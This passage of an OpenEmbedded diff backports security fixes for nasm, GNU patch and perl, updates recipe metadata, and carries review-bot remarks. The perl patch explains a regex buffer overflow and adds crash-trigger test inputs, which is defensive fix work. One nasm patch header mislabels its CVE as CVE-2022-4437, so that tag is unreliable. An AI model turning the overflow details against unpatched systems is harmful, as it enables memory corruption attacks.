-ALTERNATIVE_LINK_NAME[ubiattach] = "${sbindir}/ubiattach"
ALTERNATIVE_LINK_NAME[ubidetach] = "${sbindir}/ubidetach"
ALTERNATIVE_LINK_NAME[ubimkvol] = "${sbindir}/ubimkvol"
ALTERNATIVE_LINK_NAME[ubirename] = "${sbindir}/ubirename"
diff --git a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
index f788e0fd43..9f4c8dc0bd 100644
--- a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
+++ b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
@@ -1,4 +1,4 @@
-From bb4e42ad3a0cdd23a1d1797e6299c76b474867c0 Mon Sep 17 00:00:00 2001
+From 81d6519499dcfebe7d21e65e002a8885a4e8d852 Mon Sep 17 00:00:00 2001
From: Joshua Watt <JPEWhacker@gmail.com>
Date: Tue, 19 Nov 2019 13:12:17 -0600
Subject: [PATCH] Add --debug-prefix-map option
@@ -11,7 +11,7 @@ Upstream-Status: Submitted [https://bugzilla.nasm.us/show_bug.cgi?id=3392635]
Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
---
- asm/nasm.c | 26 +++++++++++++++++++++++++-
+ asm/nasm.c | 24 ++++++++++++++++++++++++
include/nasmlib.h | 9 +++++++++
nasm.txt | 4 ++++
nasmlib/filename.c | 20 ++++++++++++++++++++
@@ -23,34 +23,32 @@ Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
stdlib/strlcat.c | 2 +-
test/elfdebugprefix.asm | 6 ++++++
test/performtest.pl | 12 ++++++++++--
- 12 files changed, 83 insertions(+), 10 deletions(-)
+ 12 files changed, 82 insertions(+), 9 deletions(-)
create mode 100644 test/elfdebugprefix.asm
diff --git a/asm/nasm.c b/asm/nasm.c
-index a0e1719..fc6c62e 100644
+index e5ae89a..7a7f8b4 100644
--- a/asm/nasm.c
+++ b/asm/nasm.c
-@@ -938,7 +938,8 @@ enum text_options {
- OPT_LIMIT,
+@@ -939,6 +939,7 @@ enum text_options {
OPT_KEEP_ALL,
OPT_NO_LINE,
-- OPT_DEBUG
-+ OPT_DEBUG,
-+ OPT_DEBUG_PREFIX_MAP
+ OPT_DEBUG,
++ OPT_DEBUG_PREFIX_MAP,
+ OPT_REPRODUCIBLE
};
enum need_arg {
- ARG_NO,
-@@ -970,6 +971,7 @@ static const struct textargs textopts[] = {
+@@ -971,6 +972,7 @@ static const struct textargs textopts[] = {
{"keep-all", OPT_KEEP_ALL, ARG_NO, 0},
{"no-line", OPT_NO_LINE, ARG_NO, 0},
{"debug", OPT_DEBUG, ARG_MAYBE, 0},
+ {"debug-prefix-map", OPT_DEBUG_PREFIX_MAP, true, 0},
+ {"reproducible", OPT_REPRODUCIBLE, ARG_NO, 0},
{NULL, OPT_BOGUS, ARG_NO, 0}
};
-
-@@ -1332,6 +1334,26 @@ static bool process_arg(char *p, char *q, int pass)
- case OPT_DEBUG:
- debug_nasm = param ? strtoul(param, NULL, 10) : debug_nasm+1;
+@@ -1337,6 +1339,26 @@ static bool process_arg(char *p, char *q, int pass)
+ case OPT_REPRODUCIBLE:
+ reproducible = true;
break;
+ case OPT_DEBUG_PREFIX_MAP: {
+ struct debug_prefix_list *d;
@@ -75,7 +73,7 @@ index a0e1719..fc6c62e 100644
case OPT_HELP:
help(stdout);
exit(0);
-@@ -2297,6 +2319,8 @@ static void help(FILE *out)
+@@ -2304,6 +2326,8 @@ static void help(FILE *out)
" -w-x disable warning x (also -Wno-x)\n"
" -w[+-]error promote all warnings to errors (also -Werror)\n"
" -w[+-]error=x promote warning x to errors (also -Werror=x)\n"
@@ -85,7 +83,7 @@ index a0e1719..fc6c62e 100644
fprintf(out, " %-20s %s\n",
diff --git a/include/nasmlib.h b/include/nasmlib.h
-index e9bfbcc..98fc653 100644
+index 438178d..4c3e90d 100644
--- a/include/nasmlib.h
+++ b/include/nasmlib.h
@@ -250,10 +250,19 @@ int64_t readstrnum(char *str, int length, bool *warn);
@@ -181,10 +179,10 @@ index 54b22f8..c4a412c 100644
static void as86_cleanup(void)
diff --git a/output/outcoff.c b/output/outcoff.c
-index bcd9ff3..15bfcf3 100644
+index 58fa024..14baf7b 100644
--- a/output/outcoff.c
+++ b/output/outcoff.c
-@@ -1095,14 +1095,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
+@@ -1072,14 +1072,14 @@ static void coff_symbol(char *name, int32_t strpos, int32_t value,
static void coff_write_symbols(void)
{
@@ -215,7 +213,7 @@ index 61af020..1292958 100644
nsects = sectlen = 0;
syms = saa_init((int32_t)sizeof(struct elf_symbol));
diff --git a/output/outieee.c b/output/outieee.c
-index 4cc0f0f..2468724 100644
+index 6d6d4b2..cdb8333 100644
--- a/output/outieee.c
+++ b/output/outieee.c
@@ -207,7 +207,7 @@ static void ieee_unqualified_name(char *, char *);
@@ -228,10 +226,10 @@ index 4cc0f0f..2468724 100644
fpubhead = NULL;
fpubtail = &fpubhead;
diff --git a/output/outobj.c b/output/outobj.c
-index 0d4d311..d8dd6a0 100644
+index 56b43f9..fefea94 100644
--- a/output/outobj.c
+++ b/output/outobj.c
-@@ -638,7 +638,7 @@ static enum directive_result obj_directive(enum directive, char *);
+@@ -644,7 +644,7 @@ static enum directive_result obj_directive(enum directive, char *);
static void obj_init(void)
{
diff --git a/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
new file mode 100644
index 0000000000..1bd49c9fd9
--- /dev/null
+++ b/meta/recipes-devtools/nasm/nasm/CVE-2022-44370.patch
@@ -0,0 +1,104 @@
+From b37677f7e40276bd8f504584bcba2c092f1146a8 Mon Sep 17 00:00:00 2001
+From: "H. Peter Anvin" <hpa@zytor.com>
+Date: Mon, 7 Nov 2022 10:26:03 -0800
+Subject: [PATCH] quote_for_pmake: fix counter underrun resulting in segfault
+
+while (nbs--) { ... } ends with nbs == -1. Rather than a minimal fix,
+introduce mempset() to make these kinds of errors less likely in the
+future.
+
+Fixes: https://bugzilla.nasm.us/show_bug.cgi?id=3392815
+Reported-by: <13579and24680@gmail.com>
+Signed-off-by: H. Peter Anvin <hpa@zytor.com>
+
+Upstream-Status: Backport
+CVE: CVE-2022-4437
+
+Reference to upstream patch:
+[https://github.com/netwide-assembler/nasm/commit/2d4e6952417ec6f08b6f135d2b5d0e19b7dae30d]
+
+Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com>
+---
+ asm/nasm.c | 12 +++++-------
+ configure.ac | 1 +
+ include/compiler.h | 7 +++++++
+ 3 files changed, 13 insertions(+), 7 deletions(-)
+
+diff --git a/asm/nasm.c b/asm/nasm.c
+index 7a7f8b4..675cff4 100644
+--- a/asm/nasm.c
++++ b/asm/nasm.c
+@@ -1,6 +1,6 @@
+ /* ----------------------------------------------------------------------- *
+ *
+- * Copyright 1996-2020 The NASM Authors - All Rights Reserved
++ * Copyright 1996-2022 The NASM Authors - All Rights Reserved
+ * See the file AUTHORS included with the NASM distribution for
+ * the specific copyright holders.
+ *
+@@ -814,8 +814,7 @@ static char *quote_for_pmake(const char *str)
+ }
+
+ /* Convert N backslashes at the end of filename to 2N backslashes */
+- if (nbs)
+- n += nbs;
++ n += nbs;
+
+ os = q = nasm_malloc(n);
+
+@@ -824,10 +823,10 @@ static char *quote_for_pmake(const char *str)
+ switch (*p) {
+ case ' ':
+ case '\t':
+- while (nbs--)
+- *q++ = '\\';
++ q = mempset(q, '\\', nbs);
+ *q++ = '\\';
+ *q++ = *p;
++ nbs = 0;
+ break;
+ case '$':
+ *q++ = *p;
+@@ -849,9 +848,8 @@ static char *quote_for_pmake(const char *str)
+ break;
+ }
+ }
+- while (nbs--)
+- *q++ = '\\';
+
++ q = mempset(q, '\\', nbs);
+ *q = '\0';
+
+ return os;
+diff --git a/configure.ac b/configure.ac
+index 39680b1..940ebe2 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -199,6 +199,7 @@ AC_CHECK_FUNCS(strrchrnul)
+ AC_CHECK_FUNCS(iscntrl)
+ AC_CHECK_FUNCS(isascii)
+ AC_CHECK_FUNCS(mempcpy)
++AC_CHECK_FUNCS(mempset)
+
+ AC_CHECK_FUNCS(getuid)
+ AC_CHECK_FUNCS(getgid)
+diff --git a/include/compiler.h b/include/compiler.h
+index db3d6d6..b64da6a 100644
+--- a/include/compiler.h
++++ b/include/compiler.h
+@@ -256,6 +256,13 @@ static inline void *mempcpy(void *dst, const void *src, size_t n)
+ }
+ #endif
+
++#ifndef HAVE_MEMPSET
++static inline void *mempset(void *dst, int c, size_t n)
++{
++ return (char *)memset(dst, c, n) + n;
++}
++#endif
++
+ /*
+ * Hack to support external-linkage inline functions
+ */
+--
+2.40.0
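Review bot: The `CVE:` tag in the patch header reads `CVE-2022-4437`, which does not match the file name `CVE-2022-44370.patch` or the SRC_URI entry added to the nasm recipe; it looks like a dropped trailing digit. Tooling that reads the tag to decide which CVEs are patched would record a different identifier, so the header line should be `CVE: CVE-2022-44370`. Separately, the `From` line carries commit b37677f7e40276bd8f504584bcba2c092f1146a8 while the "Reference to upstream patch" URL names 2d4e6952417ec6f08b6f135d2b5d0e19b7dae30d; a short remark in the header saying which of the two is the upstream commit would make the backport easier to audit.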
diff --git a/meta/recipes-devtools/nasm/nasm_2.15.03.bb b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
index 5c4e28de06..c5638debdd 100644
--- a/meta/recipes-devtools/nasm/nasm_2.15.03.bb
+++ b/meta/recipes-devtools/nasm/nasm_2.15.05.bb
@@ -1,18 +1,21 @@
SUMMARY = "General-purpose x86 assembler"
SECTION = "devel"
+HOMEPAGE = "http://www.nasm.us/"
+DESCRIPTION = "The Netwide Assembler (NASM) is an assembler and disassembler for the Intel x86 architecture."
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://LICENSE;md5=90904486f8fbf1861cf42752e1a39efe"
SRC_URI = "http://www.nasm.us/pub/nasm/releasebuilds/${PV}/nasm-${PV}.tar.bz2 \
file://0001-stdlib-Add-strlcat.patch \
file://0002-Add-debug-prefix-map-option.patch \
+ file://CVE-2022-44370.patch \
"
-SRC_URI[sha256sum] = "04e7343d9bf112bffa9fda86f6c7c8b120c2ccd700b882e2db9f57484b1bd778"
+SRC_URI[sha256sum] = "3c4b8339e5ab54b1bcb2316101f8985a5da50a3f9e504d43fa6f35668bee2fd0"
EXTRA_AUTORECONF_append = " -I autoconf/m4"
-inherit autotools
+inherit autotools-brokensep
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-devtools/ninja/ninja_1.10.0.bb b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
index ba3398c5d6..755b73a173 100644
--- a/meta/recipes-devtools/ninja/ninja_1.10.0.bb
+++ b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Ninja is a small build system with a focus on speed."
HOMEPAGE = "https://ninja-build.org/"
+DESCRIPTION = "Ninja is a small build system with a focus on speed. It differs from other build systems in two major respects: it is designed to have its input files generated by a higher-level build system, and it is designed to run builds as fast as possible."
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=a81586a64ad4e476c791cda7e2f2c52e"
@@ -7,7 +8,7 @@ DEPENDS = "re2c-native ninja-native"
SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f"
-SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release"
+SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
S = "${WORKDIR}/git"
@@ -28,3 +29,6 @@ do_install() {
}
BBCLASSEXTEND = "native nativesdk"
+
+# This is a different Ninja
+CVE_CHECK_WHITELIST += "CVE-2021-4336"
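Review bot: The comment `# This is a different Ninja` above the `CVE_CHECK_WHITELIST` entry does not say which product CVE-2021-4336 is filed against or where that was checked, so the next person auditing the whitelist has to redo the lookup. The perl recipe in this same diff cites an advisory URL next to its whitelist entry, and the same would help here, e.g. `# CVE-2021-4336 is filed against an unrelated product that shares the name "Ninja", not ninja-build: <advisory URL>`.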
diff --git a/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
new file mode 100644
index 0000000000..bec21e67f4
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
@@ -0,0 +1,50 @@
+From 8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba Mon Sep 17 00:00:00 2001
+From: Jo-Philipp Wich <jo@mein.io>
+Date: Wed, 1 Apr 2020 21:47:40 +0200
+Subject: [PATCH 001/104] file_util.c: fix possible bad memory access in
+ file_read_line_alloc()
+
+In the case of a zero length string being returned by fgets(), the condition
+checking for a trailing new line would perform a bad memory access outside
+of `buf`. This might happen when line with a leading null byte is read.
+
+Avoid this case by checking that the string has a length of at least one
+byte. Also change the unsigned int types to size_t to store length values
+while we're at it.
+
+Upstream-Status: Backport [https://github.com/ndmsystems/opkg/commit/8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba]
+
+Signed-off-by: Jo-Philipp Wich <jo@mein.io>
+Signed-off-by: Alejandro del Castillo <alejandro.delcastillo@ni.com>
+Signed-off-by: virendra thakur <virendrak@kpit.com>
+---
+ libopkg/file_util.c | 7 ++-----
+ 1 file changed, 2 insertions(+), 5 deletions(-)
+
+diff --git a/libopkg/file_util.c b/libopkg/file_util.c
+index fbed7b4..ee9f59d 100644
+--- a/libopkg/file_util.c
++++ b/libopkg/file_util.c
+@@ -127,17 +127,14 @@ char *file_readlink_alloc(const char *file_name)
+ */
+ char *file_read_line_alloc(FILE * fp)
+ {
++ size_t buf_len, line_size;
+ char buf[BUFSIZ];
+- unsigned int buf_len;
+ char *line = NULL;
+- unsigned int line_size = 0;
+ int got_nl = 0;
+
+- buf[0] = '\0';
+-
+ while (fgets(buf, BUFSIZ, fp)) {
+ buf_len = strlen(buf);
+- if (buf[buf_len - 1] == '\n') {
++ if (buf_len > 0 && buf[buf_len - 1] == '\n') {
+ buf_len--;
+ buf[buf_len] = '\0';
+ got_nl = 1;
+--
+2.25.1
+
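Review bot: `line_size` loses its `= 0` initialiser when the declarations are merged into `size_t buf_len, line_size;`, so its first use now depends on the loop assigning it before reading it. The rest of `file_read_line_alloc()` is outside this hunk, so that ordering cannot be confirmed from here. Keeping the initialiser, `size_t buf_len, line_size = 0;`, costs nothing and stops a later refactor from turning this into a read of an indeterminate length.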
diff --git a/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch b/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch
new file mode 100644
index 0000000000..4578fa33be
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch
@@ -0,0 +1,24 @@
+Having CLEAN_DATE come from the current date doesn't allow for build
+reproducibility. Add the option of using SOURCE_DATE_EPOCH if set
+which for OE, it will be.
+
+Upstream-Status: Pending
+RP 2021/2/2
+
+Index: opkg-0.4.4/configure.ac
+===================================================================
+--- opkg-0.4.4.orig/configure.ac
++++ opkg-0.4.4/configure.ac
+@@ -281,7 +281,11 @@ AC_FUNC_UTIME_NULL
+ AC_FUNC_VPRINTF
+ AC_CHECK_FUNCS([memmove memset mkdir regcomp strchr strcspn strdup strerror strndup strrchr strstr strtol strtoul sysinfo utime])
+
+-CLEAN_DATE=`date +"%B %Y" | tr -d '\n'`
++if ! test -z "$SOURCE_DATE_EPOCH" ; then
++ CLEAN_DATE=`LC_ALL=C date -d @$SOURCE_DATE_EPOCH +"%B %Y" | tr -d '\n'`
++else
++ CLEAN_DATE=`date +"%B %Y" | tr -d '\n'`
++fi
+
+ AC_SUBST([CLEAN_DATE])
+
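Review bot: The SOURCE_DATE_EPOCH branch formats the date in the build host's local time zone, so an epoch close to a month boundary can still yield a different `%B %Y` on hosts in different zones, which undercuts the reproducibility the patch is after. Adding `-u` and quoting the variable closes that gap: ``CLEAN_DATE=`LC_ALL=C date -u -d "@$SOURCE_DATE_EPOCH" +"%B %Y" | tr -d '\n'` ``. `date -d @N` is GNU date syntax, which is presumably fine for OE build hosts but would likely need a fallback before the change goes upstream (the header marks it Pending).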
diff --git a/meta/recipes-devtools/opkg/opkg_0.4.2.bb b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
index 66a74dc5ed..3ebc27c8ee 100644
--- a/meta/recipes-devtools/opkg/opkg_0.4.2.bb
+++ b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
@@ -2,6 +2,7 @@ SUMMARY = "Open Package Manager"
SUMMARY_libopkg = "Open Package Manager library"
SECTION = "base"
HOMEPAGE = "http://code.google.com/p/opkg/"
+DESCRIPTION = "Opkg is a lightweight package management system based on Ipkg."
BUGTRACKER = "http://code.google.com/p/opkg/issues/list"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f \
@@ -14,6 +15,8 @@ PE = "1"
SRC_URI = "http://downloads.yoctoproject.org/releases/${BPN}/${BPN}-${PV}.tar.gz \
file://opkg.conf \
file://0001-opkg_conf-create-opkg.lock-in-run-instead-of-var-run.patch \
+ file://sourcedateepoch.patch \
+ file://0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch \
file://run-ptest \
"
@@ -48,7 +51,9 @@ EXTRA_OECONF_class-native = "--localstatedir=/${@os.path.relpath('${localstatedi
do_install_append () {
install -d ${D}${sysconfdir}/opkg
install -m 0644 ${WORKDIR}/opkg.conf ${D}${sysconfdir}/opkg/opkg.conf
- echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option info_dir ${OPKGLIBDIR}/opkg/info" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option status_file ${OPKGLIBDIR}/opkg/status" >>${D}${sysconfdir}/opkg/opkg.conf
# We need to create the lock directory
install -d ${D}${OPKGLIBDIR}/opkg
diff --git a/meta/recipes-devtools/orc/orc_0.4.31.bb b/meta/recipes-devtools/orc/orc_0.4.31.bb
index cd4dc31d70..ba2c349c9f 100644
--- a/meta/recipes-devtools/orc/orc_0.4.31.bb
+++ b/meta/recipes-devtools/orc/orc_0.4.31.bb
@@ -1,5 +1,6 @@
SUMMARY = "Optimised Inner Loop Runtime Compiler"
HOMEPAGE = "http://gstreamer.freedesktop.org/modules/orc.html"
+DESCRIPTION = "Optimised Inner Loop Runtime Compiler is a Library and set of tools for compiling and executing SIMD assembly language-like programs that operate on arrays of data."
LICENSE = "BSD-2-Clause & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=1400bd9d09e8af56b9ec982b3d85797e"
diff --git a/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch b/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch
new file mode 100644
index 0000000000..03988a179c
--- /dev/null
+++ b/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch
@@ -0,0 +1,31 @@
+From 15b158db3ae11cb835f2eb8d2eb48e09d1a4af48 Mon Sep 17 00:00:00 2001
+From: Andreas Gruenbacher <agruen@gnu.org>
+Date: Mon, 15 Jul 2019 19:10:02 +0200
+Subject: Avoid invalid memory access in context format diffs
+
+* src/pch.c (another_hunk): Avoid invalid memory access in context format
+diffs.
+
+CVE: CVE-2019-20633
+Upstream-Status: Backport[https://git.savannah.gnu.org/cgit/patch.git/patch/?id=15b158db3ae11cb835f2eb8d2eb48e09d1a4af48]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ src/pch.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/src/pch.c b/src/pch.c
+index a500ad9..cb54e03 100644
+--- a/src/pch.c
++++ b/src/pch.c
+@@ -1328,6 +1328,7 @@ another_hunk (enum diff difftype, bool rev)
+ ptrn_prefix_context = context;
+ ptrn_suffix_context = context;
+ if (repl_beginning
++ || p_end <= 0
+ || (p_end
+ != p_ptrn_lines + 1 + (p_Char[p_end - 1] == '\n')))
+ {
+--
+cgit v1.2.1
+
diff --git a/meta/recipes-devtools/patch/patch_2.7.6.bb b/meta/recipes-devtools/patch/patch_2.7.6.bb
index b5897b357a..1997af0c25 100644
--- a/meta/recipes-devtools/patch/patch_2.7.6.bb
+++ b/meta/recipes-devtools/patch/patch_2.7.6.bb
@@ -10,6 +10,7 @@ SRC_URI += "file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://0001-Invoke-ed-directly-instead-of-using-the-shell.patch \
file://0001-Don-t-leak-temporary-file-on-failed-ed-style-patch.patch \
file://0001-Don-t-leak-temporary-file-on-failed-multi-file-ed.patch \
+ file://CVE-2019-20633.patch \
"
SRC_URI[md5sum] = "4c68cee989d83c87b00a3860bcd05600"
diff --git a/meta/recipes-devtools/patchelf/patchelf_0.10.bb b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
index 84e640773b..2bf3108f88 100644
--- a/meta/recipes-devtools/patchelf/patchelf_0.10.bb
+++ b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
@@ -1,12 +1,15 @@
-SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \
+SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
+DESCRIPTION = "PatchELF is a simple utility for modifying existing ELF executables and libraries."
+HOMEPAGE = "https://github.com/NixOS/patchelf"
+
+LICENSE = "GPLv3"
+
+SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \
file://handle-read-only-files.patch \
file://fix-adjusting-startPage.patch \
file://fix-phdrs.patch \
"
-LICENSE = "GPLv3"
-SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
-
SRCREV = "e1e39f3639e39360ceebb2f7ed533cede4623070"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-31484.patch b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
new file mode 100644
index 0000000000..0fea7bf8a8
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2023-31484
+Upstream-Status: Backport [ import from Ubuntu perl_5.30.0-9ubuntu0.5
+upstream https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 9c98370287f4e709924aee7c58ef21c85289a7f0 Mon Sep 17 00:00:00 2001
+From: Stig Palmquist <git@stig.io>
+Date: Tue, 28 Feb 2023 11:54:06 +0100
+Subject: [PATCH] Add verify_SSL=>1 to HTTP::Tiny to verify https server
+ identity
+
+---
+ lib/CPAN/HTTP/Client.pm | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/cpan/CPAN/lib/CPAN/HTTP/Client.pm b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+index 4fc792c26..a616fee20 100644
+--- a/cpan/CPAN/lib/CPAN/HTTP/Client.pm
++++ b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+@@ -32,6 +32,7 @@ sub mirror {
+
+ my $want_proxy = $self->_want_proxy($uri);
+ my $http = HTTP::Tiny->new(
++ verify_SSL => 1,
+ $want_proxy ? (proxy => $self->{proxy}) : ()
+ );
+
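Review bot: `verify_SSL => 1` only helps when HTTP::Tiny can actually perform verification, which needs IO::Socket::SSL and Net::SSLeay plus a CA bundle at run time, and nothing in this patch or its header says the target image provides them. Where they are missing, https mirror fetches should fail rather than proceed unverified, which is the safe outcome but will surprise users. A sentence in the patch header such as `Note: https mirrors now require IO::Socket::SSL, Net::SSLeay and a CA bundle on the target` would document that. The diffstat also names `lib/CPAN/HTTP/Client.pm` while the diff itself targets `cpan/CPAN/lib/CPAN/HTTP/Client.pm`, apparently left over from the import.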
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-47038.patch b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
new file mode 100644
index 0000000000..59252c560c
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
@@ -0,0 +1,121 @@
+as per https://ubuntu.com/security/CVE-2023-47100 , CVE-2023-47100 is duplicate of CVE-2023-47038
+CVE: CVE-2023-47038 CVE-2023-47100
+Upstream-Status: Backport [ import from ubuntu perl_5.30.0-9ubuntu0.5
+upstream https://github.com/Perl/perl5/commit/12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 Mon Sep 17 00:00:00 2001
+From: Karl Williamson <khw@cpan.org>
+Date: Sat, 9 Sep 2023 11:59:09 -0600
+Subject: [PATCH 1/2] Fix read/write past buffer end: perl-security#140
+
+A package name may be specified in a \p{...} regular expression
+construct. If unspecified, "utf8::" is assumed, which is the package
+all official Unicode properties are in. By specifying a different
+package, one can create a user-defined property with the same
+unqualified name as a Unicode one. Such a property is defined by a sub
+whose name begins with "Is" or "In", and if the sub wishes to refer to
+an official Unicode property, it must explicitly specify the "utf8::".
+S_parse_uniprop_string() is used to parse the interior of both \p{} and
+the user-defined sub lines.
+
+In S_parse_uniprop_string(), it parses the input "name" parameter,
+creating a modified copy, "lookup_name", malloc'ed with the same size as
+"name". The modifications are essentially to create a canonicalized
+version of the input, with such things as extraneous white-space
+stripped off. I found it convenient to strip off the package specifier
+"utf8::". To to so, the code simply pretends "lookup_name" begins just
+after the "utf8::", and adjusts various other values to compensate.
+However, it missed the adjustment of one required one.
+
+This is only a problem when the property name begins with "perl" and
+isn't "perlspace" nor "perlword". All such ones are undocumented
+internal properties.
+
+What happens in this case is that the input is reparsed with slightly
+different rules in effect as to what is legal versus illegal. The
+problem is that "lookup_name" no longer is pointing to its initial
+value, but "name" is. Thus the space allocated for filling "lookup_name"
+is now shorter than "name", and as this shortened "lookup_name" is
+filled by copying suitable portions of "name", the write can be to
+unallocated space.
+
+The solution is to skip the "utf8::" when reparsing "name". Then both
+"lookup_name" and "name" are effectively shortened by the same amount,
+and there is no going off the end.
+
+This commit also does white-space adjustment so that things align
+vertically for readability.
+
+This can be easily backported to earlier Perl releases.
+---
+ regcomp.c | 17 +++++++++++------
+ t/re/pat_advanced.t | 8 ++++++++
+ 2 files changed, 19 insertions(+), 6 deletions(-)
+
+--- a/regcomp.c
++++ b/regcomp.c
+@@ -22606,7 +22606,7 @@ Perl_parse_uniprop_string(pTHX_
+ * compile perl to know about them) */
+ bool is_nv_type = FALSE;
+
+- unsigned int i, j = 0;
++ unsigned int i = 0, i_zero = 0, j = 0;
+ int equals_pos = -1; /* Where the '=' is found, or negative if none */
+ int slash_pos = -1; /* Where the '/' is found, or negative if none */
+ int table_index = 0; /* The entry number for this property in the table
+@@ -22717,9 +22717,13 @@ Perl_parse_uniprop_string(pTHX_
+ * all of them are considered to be for that package. For the purposes of
+ * parsing the rest of the property, strip it off */
+ if (non_pkg_begin == STRLENs("utf8::") && memBEGINPs(name, name_len, "utf8::")) {
+- lookup_name += STRLENs("utf8::");
+- j -= STRLENs("utf8::");
+- equals_pos -= STRLENs("utf8::");
++ lookup_name += STRLENs("utf8::");
++ j -= STRLENs("utf8::");
++ equals_pos -= STRLENs("utf8::");
++ i_zero = STRLENs("utf8::"); /* When resetting 'i' to reparse
++ from the beginning, it has to be
++ set past what we're stripping
++ off */
+ }
+
+ /* Here, we are either done with the whole property name, if it was simple;
+@@ -22997,7 +23001,8 @@ Perl_parse_uniprop_string(pTHX_
+
+ /* We set the inputs back to 0 and the code below will reparse,
+ * using strict */
+- i = j = 0;
++ i = i_zero;
++ j = 0;
+ }
+ }
+
+@@ -23018,7 +23023,7 @@ Perl_parse_uniprop_string(pTHX_
+ * separates two digits */
+ if (cur == '_') {
+ if ( stricter
+- && ( i == 0 || (int) i == equals_pos || i == name_len- 1
++ && ( i == i_zero || (int) i == equals_pos || i == name_len- 1
+ || ! isDIGIT_A(name[i-1]) || ! isDIGIT_A(name[i+1])))
+ {
+ lookup_name[j++] = '_';
+--- a/t/re/pat_advanced.t
++++ b/t/re/pat_advanced.t
+@@ -2524,6 +2524,14 @@ EOF
+ "", {}, "*COMMIT caused positioning beyond EOS");
+ }
+
++ { # perl-security#140, read/write past buffer end
++ fresh_perl_like('qr/\p{utf8::perl x}/',
++ qr/Illegal user-defined property name "utf8::perl x" in regex/,
++ {}, "perl-security#140");
++ fresh_perl_is('qr/\p{utf8::_perl_surrogate}/', "",
++ {}, "perl-security#140");
++ }
++
+
+ # !!! NOTE that tests that aren't at all likely to crash perl should go
+ # a ways above, above these last ones. There's a comment there that, like
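Review bot: The embedded Subject is `[PATCH 1/2]`, but the header does not say what the second patch of that series contains or why it is not carried, and the perl recipe hunk in this diff adds only this one file for the CVE. If 2/2 is documentation or otherwise unrelated to the fix, a header line such as `Note: 2/2 of the upstream series is not needed for the fix (<reason>)` would let an auditor confirm the backport is complete without chasing the Ubuntu package.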
diff --git a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
index a6fd7b1c07..c91b44cd6e 100644
--- a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
+++ b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
@@ -37,6 +37,7 @@ EXTRA_CPAN_BUILD_FLAGS = "--create_packlist=0"
do_install_append () {
